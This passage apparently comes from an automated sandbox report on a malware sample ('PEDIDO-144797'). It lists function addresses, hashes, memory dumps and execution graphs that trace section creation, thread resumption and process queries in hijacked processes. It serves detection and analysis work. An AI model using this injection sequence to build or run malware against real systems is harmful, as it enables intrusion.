                                                                                                                                          • Instruction ID: 783d7b28b3b703744c7bfc7b865dd5a90973b2dd2608620705594a553a4e87b8
                                                                                                                                          • Opcode Fuzzy Hash: 87154550091c2c2e846a261ea03ae8667d2aa4d884dfdfa48349292a1e34a80c
                                                                                                                                          • Instruction Fuzzy Hash: 5D51B0F5A00B46DFEB28DFA4C5607EAB7F4AF44344F10483ED99593240EB749945CBA2
                                                                                                                                          Function 3269E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: ^i2
                                                                                                                                          • API String ID: 3446177414-3653053131
                                                                                                                                          • Opcode ID: b9320aade08508a7700f6b5e423086cb5346389a7dc522f16f8e6e66821d663d
                                                                                                                                          • Instruction ID: 3f6b7d6c1c765b1188322195c840f7fbee401baea84874ed49d0ce664e53fab6
                                                                                                                                          • Opcode Fuzzy Hash: b9320aade08508a7700f6b5e423086cb5346389a7dc522f16f8e6e66821d663d
                                                                                                                                          • Instruction Fuzzy Hash: B8415FB9A00311DFDB19CF19C4849997BE5FF99754B20846BEC088B361DB71E891CB91
                                                                                                                                          Function 3269E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: i2$mi2
                                                                                                                                          • API String ID: 3446177414-3611007801
                                                                                                                                          • Opcode ID: 0af238245ecbc8f9e70c4a121156819e18c9f8097fdd1e3f92eafe9d17b83a89
                                                                                                                                          • Instruction ID: 218f732e2ad663ed4f5b69d5af5392aba06798b0f8809b7c12823cbf368b17d6
                                                                                                                                          • Opcode Fuzzy Hash: 0af238245ecbc8f9e70c4a121156819e18c9f8097fdd1e3f92eafe9d17b83a89
                                                                                                                                          • Instruction Fuzzy Hash: 2211C3B6A01208AFDF11CF98D985ADEBBB8FF4C360F10401AF911B7240D775AA54CBA4

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:2%
                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:19
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 3993 50c991c 3997 50c992b 3993->3997 3994 50c9946 SleepEx 3996 50c9996 NtCreateSection 3994->3996 3994->3997 3995 50c9973 3996->3995 3997->3994 3997->3995 3998 50cdc18 4000 50cdc1d 3998->4000 3999 50cdd25 4000->3999 4002 50c9ab4 4000->4002 4005 50c9ada 4002->4005 4003 50c9b08 SleepEx 4004 50c9b3c 4003->4004 4003->4005 4006 50c9b75 NtResumeThread 4004->4006 4007 50c9af9 4004->4007 4005->4003 4005->4007 4006->4007 4007->3999 4008 50c98b1 4010 50c98c6 4008->4010 4009 50c9946 SleepEx 4009->4010 4011 50c9996 NtCreateSection 4009->4011 4010->4009 4012 50c9973 4010->4012 4011->4012

                                                                                                                                          Executed Functions

                                                                                                                                          Function 050C98B1 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174nativeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 50c98b1-50c98c4 1 50c992c-50c993e 0->1 2 50c98c6 0->2 3 50c993f-50c9944 1->3 2->3 4 50c98c8-50c98f3 2->4 6 50c9946-50c9952 SleepEx 3->6 4->1 7 50c9954-50c9958 6->7 8 50c9996-50c99eb NtCreateSection 6->8 9 50c996c-50c9971 7->9 10 50c995a-50c9967 call 50d6ba4 7->10 11 50c99ed-50c9a06 8->11 12 50c9973-50c997a 8->12 9->6 9->12 10->9 11->12 17 50c9a0c-50c9a4b 11->17 15 50c997c-50c9995 12->15 17->12 19 50c9a51-50c9a8f 17->19 19->12 21 50c9a95-50c9aad 19->21 21->15
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateSectionSleep
                                                                                                                                          • String ID: 0$@$@
                                                                                                                                          • API String ID: 2866269021-3221051908
                                                                                                                                          • Opcode ID: ecc48c8b9e49aba649bdce03b80a7305576d51156abe5fa8b438fd95c911a9c4
                                                                                                                                          • Instruction ID: f9ba1f3c4cd63a59c1ad49184a38df221b3726243325a3fd02ce8051cf951755
                                                                                                                                          • Opcode Fuzzy Hash: ecc48c8b9e49aba649bdce03b80a7305576d51156abe5fa8b438fd95c911a9c4
                                                                                                                                          • Instruction Fuzzy Hash: 6751CD71A18B488FCB45CF58E8853DEBBE5FF49310F10065EE88A97291DB31E142CB86
                                                                                                                                          Function 050C9AB4 Relevance: 3.1, APIs: 2, Instructions: 92nativethreadCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ResumeSleepThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1530989685-0
                                                                                                                                          • Opcode ID: 5fec67864056c09bc9aaa3d34206ce9274a471ec975c8b0fa745e485cfda6ffb
                                                                                                                                          • Instruction ID: 5a6df502d788d0cce6978a4fed488507fe09f649678005be6823c277818a90e0
                                                                                                                                          • Opcode Fuzzy Hash: 5fec67864056c09bc9aaa3d34206ce9274a471ec975c8b0fa745e485cfda6ffb
                                                                                                                                          • Instruction Fuzzy Hash: FD21D370218B4D9FDB98DF6894496AEBBD1FB59390F000B6DD85AC3291EF31E5418B41
                                                                                                                                          Function 050C991C Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 42 50c991c-50c9929 43 50c992b-50c9944 42->43 44 50c9970-50c9971 42->44 45 50c9946-50c9952 SleepEx 43->45 44->45 46 50c9973-50c997a 44->46 47 50c9954-50c9958 45->47 48 50c9996-50c99eb NtCreateSection 45->48 49 50c997c-50c9995 46->49 50 50c996c-50c996e 47->50 51 50c995a-50c9967 call 50d6ba4 47->51 48->46 52 50c99ed-50c9a06 48->52 50->44 51->50 52->46 55 50c9a0c-50c9a4b 52->55 55->46 57 50c9a51-50c9a8f 55->57 57->46 59 50c9a95-50c9aad 57->59 59->49
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateSectionSleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2866269021-0
                                                                                                                                          • Opcode ID: e256ba99ca2e8df73d4bef9c632c67323f3053b72e425abc3965123d84c068dd
                                                                                                                                          • Instruction ID: 1a49a97e8009f939c925fa4d16474a58a064a8dd3d43db60c66153bcaf4d6d0e
                                                                                                                                          • Opcode Fuzzy Hash: e256ba99ca2e8df73d4bef9c632c67323f3053b72e425abc3965123d84c068dd
                                                                                                                                          • Instruction Fuzzy Hash: C6017B3260A7448FC71E8F48B8415FD7BA2FF43370F100A9EC8C51B191C6329442C6C5

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 050C5FAA Relevance: .1, Instructions: 148COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000003.00000002.94445074672.0000000004F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 04F70000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_3_2_4f70000_RAVCpl64.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2496161531caf1ee288c236aeb9e6b9a8fe68de0b78c80a87773afa53ce124c0
                                                                                                                                          • Instruction ID: cad6e3e755b27a71b93f03c23231e82f5ebef4c9e030cbb8212b0bf13182453f
                                                                                                                                          • Opcode Fuzzy Hash: 2496161531caf1ee288c236aeb9e6b9a8fe68de0b78c80a87773afa53ce124c0
                                                                                                                                          • Instruction Fuzzy Hash: 3241037161CB094FD768EF6CE0816BFF7E2FB55300F50066DC98AC3252EA71E9428685

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:0.5%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:9
                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                          execution_graph 68150 2f329f0 LdrInitializeThunk 68157 2ddeeba 68158 2ddeeed 68157->68158 68159 2ddf057 NtQueryInformationProcess 68158->68159 68160 2ddf091 68158->68160 68159->68160 68162 2f32b20 68164 2f32b2a 68162->68164 68165 2f32b31 68164->68165 68166 2f32b3f LdrInitializeThunk 68164->68166

                                                                                                                                          Executed Functions

                                                                                                                                          Function 02DDEEBA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 547nativeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 2ddeeba-2ddeeeb 1 2ddeeed-2ddef04 call 2de10d8 0->1 2 2ddef09-2ddef28 call 2de10f8 call 2ddcec8 0->2 1->2 8 2ddef2e-2ddf02e call 2ddedf8 call 2de10f8 call 2de5064 call 2dd0398 call 2de06b8 call 2dd0398 call 2de06b8 call 2de2dc8 2->8 9 2ddf4e6-2ddf4f1 2->9 26 2ddf4da-2ddf4e1 call 2ddedf8 8->26 27 2ddf034-2ddf08c call 2dd0398 call 2de06b8 NtQueryInformationProcess call 2de10f8 8->27 26->9 34 2ddf091-2ddf0c2 call 2dd0398 call 2de06b8 27->34 39 2ddf0c4-2ddf0d1 34->39 40 2ddf0d6-2ddf14c call 2de5072 call 2dd0398 call 2de06b8 34->40 39->26 40->39 49 2ddf152-2ddf164 call 2de509c 40->49 52 2ddf1b4-2ddf1f4 call 2dd0398 call 2de06b8 call 2de3728 49->52 53 2ddf166-2ddf1af call 2de1de8 49->53 63 2ddf1f6-2ddf20e 52->63 64 2ddf213-2ddf303 call 2dd0398 call 2de06b8 call 2de50aa call 2dd0398 call 2de06b8 call 2de30e8 call 2de10a8 * 3 call 2de509c 52->64 53->26 63->26 87 2ddf305-2ddf32e call 2de509c call 2de10a8 call 2de50fe call 2de50b8 64->87 88 2ddf330-2ddf345 call 2de509c 64->88 99 2ddf385-2ddf38f 87->99 94 2ddf36e-2ddf380 call 2de1d28 88->94 95 2ddf347-2ddf369 call 2de2898 88->95 94->99 95->94 101 2ddf395-2ddf3df call 2dd0398 call 2de06b8 call 2de3408 call 2de509c 99->101 102 2ddf457-2ddf4ba call 2dd0398 call 2de06b8 call 2de3a48 99->102 121 2ddf414-2ddf41b 101->121 122 2ddf3e1-2ddf40a call 2de5148 call 2de50fe 101->122 102->26 127 2ddf4bc-2ddf4d5 call 2de10d8 102->127 124 2ddf41d-2ddf425 call 2de509c 121->124 125 2ddf427-2ddf432 121->125 122->121 124->102 124->125 125->102 129 2ddf434-2ddf452 call 2de3d68 125->129 127->26 129->102
                                                                                                                                          APIs
                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 02DDF076
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633262138.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2dd0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                          • String ID: 0
                                                                                                                                          • API String ID: 1778838933-4108050209
                                                                                                                                          • Opcode ID: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
                                                                                                                                          • Instruction ID: faa2cad88fbda211a811bda24079e1fdb00508e8794d448d43fdaf304fe4978b
                                                                                                                                          • Opcode Fuzzy Hash: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
                                                                                                                                          • Instruction Fuzzy Hash: 9C022870518A8C8FCFA5EF68D894AEE77E2FB99304F50461AD84AC7240DF34DA45CB91
                                                                                                                                          Function 02F334E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 152 2f334e0-2f334ec LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: dcf04b58ee4e181fc0e2f2a2545d7dc2e93e3db04997317b54d00bc4009933e4
                                                                                                                                          • Instruction ID: 887082c98eb8ed767a6beedc9e8b6df28a052678f1d3ab6608bb783e1ad2e59c
                                                                                                                                          • Opcode Fuzzy Hash: dcf04b58ee4e181fc0e2f2a2545d7dc2e93e3db04997317b54d00bc4009933e4
                                                                                                                                          • Instruction Fuzzy Hash: 6290023160510402E50075584A14B07140587D0281F61C815A1414568DCBE5895175A2
                                                                                                                                          Function 02F32A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 141 2f32a80-2f32a8c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 9e67ec9d36e792674a5b05dae20140947182de766ffa57e2280e41a299e95c1a
                                                                                                                                          • Instruction ID: e89bca76910bef7e08c63546bbf99f41c2ccddfb3deb484a613ba0f91ade5ec2
                                                                                                                                          • Opcode Fuzzy Hash: 9e67ec9d36e792674a5b05dae20140947182de766ffa57e2280e41a299e95c1a
                                                                                                                                          • Instruction Fuzzy Hash: 9290026120200003550575584914A17440A87E0281B51C425E2004590DC97588917125
                                                                                                                                          Function 02F32BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 146 2f32bc0-2f32bcc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: b83fd149b71829d908c6862526d4797d6bf8a50fbb25d2980ae14fb9f8ec0e29
                                                                                                                                          • Instruction ID: 6664d8c9482922ffc2d9997b43753ada488fa749b9bcd5ed5c72e774e5647def
                                                                                                                                          • Opcode Fuzzy Hash: b83fd149b71829d908c6862526d4797d6bf8a50fbb25d2980ae14fb9f8ec0e29
                                                                                                                                          • Instruction Fuzzy Hash: 3B90023120100402E50079985908A47040587E0381F51D415A6014555ECAB588917131
                                                                                                                                          Function 02F32B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 145 2f32b90-2f32b9c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: dfdd2a7d7659576facff9458a378d7de1d7c871bbf94d550ccaecea9d84c4cdf
                                                                                                                                          • Instruction ID: f5bbad9b9cf677f64954f2b77b5c3013d0c2078bfd51d5c8802a2371233875b4
                                                                                                                                          • Opcode Fuzzy Hash: dfdd2a7d7659576facff9458a378d7de1d7c871bbf94d550ccaecea9d84c4cdf
                                                                                                                                          • Instruction Fuzzy Hash: 0890023120108802E51075588904B4B040587D0381F55C815A5414658DCAE588917121
                                                                                                                                          Function 02F32B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 144 2f32b80-2f32b8c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 001c0b6a9989248e58e0c12cb77be6ad8849660521ce288486dbab94756beddb
                                                                                                                                          • Instruction ID: 7ef2fe7dbb04ea4fd2ca6bea883f72b120c511846891c76c3240d54fe4242291
                                                                                                                                          • Opcode Fuzzy Hash: 001c0b6a9989248e58e0c12cb77be6ad8849660521ce288486dbab94756beddb
                                                                                                                                          • Instruction Fuzzy Hash: 9B90023120100842E50075584904F47040587E0381F51C41AA1114654DCA65C8517521
                                                                                                                                          Function 02F32B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 143 2f32b10-2f32b1c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 590df0ceca419257a7228a8389d1efa2843039bbb1d54c1ac737c0f820188e73
                                                                                                                                          • Instruction ID: 9492c845c79acb35a1ce948c0ae7c429c766936fed2e926ac82d29910a9881dc
                                                                                                                                          • Opcode Fuzzy Hash: 590df0ceca419257a7228a8389d1efa2843039bbb1d54c1ac737c0f820188e73
                                                                                                                                          • Instruction Fuzzy Hash: 3890023120100802E58075584904A4B040587D1381F91C419A1015654DCE658A5977A1
                                                                                                                                          Function 02F32B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 142 2f32b00-2f32b0c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 469d6654211f33d0eac883e1985c7fb3c254a102824aac62ce5f485083a0c86f
                                                                                                                                          • Instruction ID: 63454e3a87f7fcc5087ef4d0f3d09570f0074090a23c52b413fde9be8f716708
                                                                                                                                          • Opcode Fuzzy Hash: 469d6654211f33d0eac883e1985c7fb3c254a102824aac62ce5f485083a0c86f
                                                                                                                                          • Instruction Fuzzy Hash: 5290023120504842E54075584904E47041587D0385F51C415A1054694DDA758D55B661
                                                                                                                                          Function 02F329F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 140 2f329f0-2f329fc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: ec7772489568b18091fb00c3569e31e5fbf8d9c284f1bbefdd83c06a44ca074b
                                                                                                                                          • Instruction ID: 05815dad51a73667b6f307b0ab78ed511f20c1dab25b25e08c9f7b190d7856ac
                                                                                                                                          • Opcode Fuzzy Hash: ec7772489568b18091fb00c3569e31e5fbf8d9c284f1bbefdd83c06a44ca074b
                                                                                                                                          • Instruction Fuzzy Hash: A8900225211000031505B9580B04907044687D53D1351C425F2005550CDA7188616121
                                                                                                                                          Function 02F32E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 150 2f32e50-2f32e5c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 7180aaca9bc05cb33471889073e68135f74a8f9860fa805a93d9a26494404a77
                                                                                                                                          • Instruction ID: c87d9b43673007af7bec53970d4c091ed7d8b6a29e06adf4aee43fdcd79d0800
                                                                                                                                          • Opcode Fuzzy Hash: 7180aaca9bc05cb33471889073e68135f74a8f9860fa805a93d9a26494404a77
                                                                                                                                          • Instruction Fuzzy Hash: 0D90026134100442E50075584914F070405C7E1381F51C419E2054554DCA69CC527126
                                                                                                                                          Function 02F32F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 151 2f32f00-2f32f0c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 451e2e50dd7bc68d8754550e1fb5930766215bd1a751b78adf0b3098a4cc169f
                                                                                                                                          • Instruction ID: ede9546502dd0191d371a6cb6935b46fcd7c17d0597129063e74f20459447213
